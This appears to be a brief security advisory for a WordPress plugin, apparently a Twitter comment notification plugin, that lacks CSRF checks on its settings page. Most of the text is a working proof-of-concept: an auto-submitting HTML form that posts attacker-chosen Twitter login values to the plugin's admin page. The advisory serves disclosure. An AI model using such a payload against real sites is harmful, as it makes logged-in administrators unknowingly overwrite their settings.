Description The plugin does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks
<form action="https://example.com/wp-admin/options-general.php?page=commenttweets%2FTwitterCommentNotification.php" method="POST">
<input type="text" name="twitterlogin" value="aaa">
<input type="text" name="twitterpw" value="bbb">
<input type="text" name="submit-type" value="login">
<input type="text" name="submit" value="save login">
</form>
<script>
HTMLFormElement.prototype.submit.call(
document.forms[0]
);
</script>